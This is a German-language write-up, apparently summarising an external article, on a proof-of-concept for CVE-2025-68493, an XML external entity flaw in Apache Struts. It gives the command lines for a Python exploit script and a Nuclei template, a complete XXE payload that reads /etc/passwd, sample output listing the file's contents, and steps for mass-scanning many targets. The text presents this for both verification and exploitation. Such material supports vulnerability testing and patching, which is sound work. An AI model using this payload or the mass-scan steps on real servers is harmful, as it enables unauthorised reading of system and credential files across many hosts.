
CVE-2025-68493
CVE-2025-68493
[1] ApacheStrutsXWorkXML-Schwachstelle CVE-2025-68493 PoC und Skript | ZONE.CI Global. https://zone.ci/secarticles/wx/486533.html
Zur Verifizierung und Ausnutzung der Schwachstelle CVE-2025-68493 können das bereitgestellte Python-PoC-Skript und die Nuclei-YAML-Vorlage verwendet werden.
Skriptname: cve_2025_68493_poc.py
Funktion: Dieses Skript dient zur Überprüfung einer einzelnen Zieladresse auf die Schwachstelle und versucht, eine angegebene Datei (standardmäßig /etc/passwd) auszulesen.
Voraussetzungen:
requests-Bibliothek (pip install requests)Kommandozeilenparameter:
-u, --url: Basis-URL der Zielanwendung (z. B. http://127.0.0.1:8080)-f, --file: Pfad der auszulesenden Zieldatei (standardmäßig /etc/passwd)Beispiel:
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd
Erwartete Ausgabe:
Wenn das Ziel anfällig ist und die Datei erfolgreich ausgelesen wird, wird Folgendes angezeigt:
[*] Teste URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Anfällig! /etc/passwd erfolgreich gelesen
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------
Vorlagenname: cve-2025-68493.yaml
Funktion: Diese Vorlage dient zur Massenscans mehrerer Ziele mit dem Nuclei-Tool, um die Schwachstelle CVE-2025-68493 zu erkennen.
Voraussetzungen:
Kommandozeilenparameter:
-t: Pfad zur Nuclei-Vorlagendatei-u: Einzelne Ziel-URL-l: Datei mit mehreren Ziel-URLsBeispiele:
Einzelnes Ziel scannen:
nuclei -t cve-2025-68493.yaml -u http://example.com:8080
Massenscan:
Angenommen, Sie haben eine Datei namens targets.txt, in der jede Zeile eine Ziel-URL enthält:
http://target1.com:8080
http://target2.com:8080
Führen Sie folgenden Befehl für den Massenscan aus:
nuclei -t cve-2025-68493.yaml -l targets.txt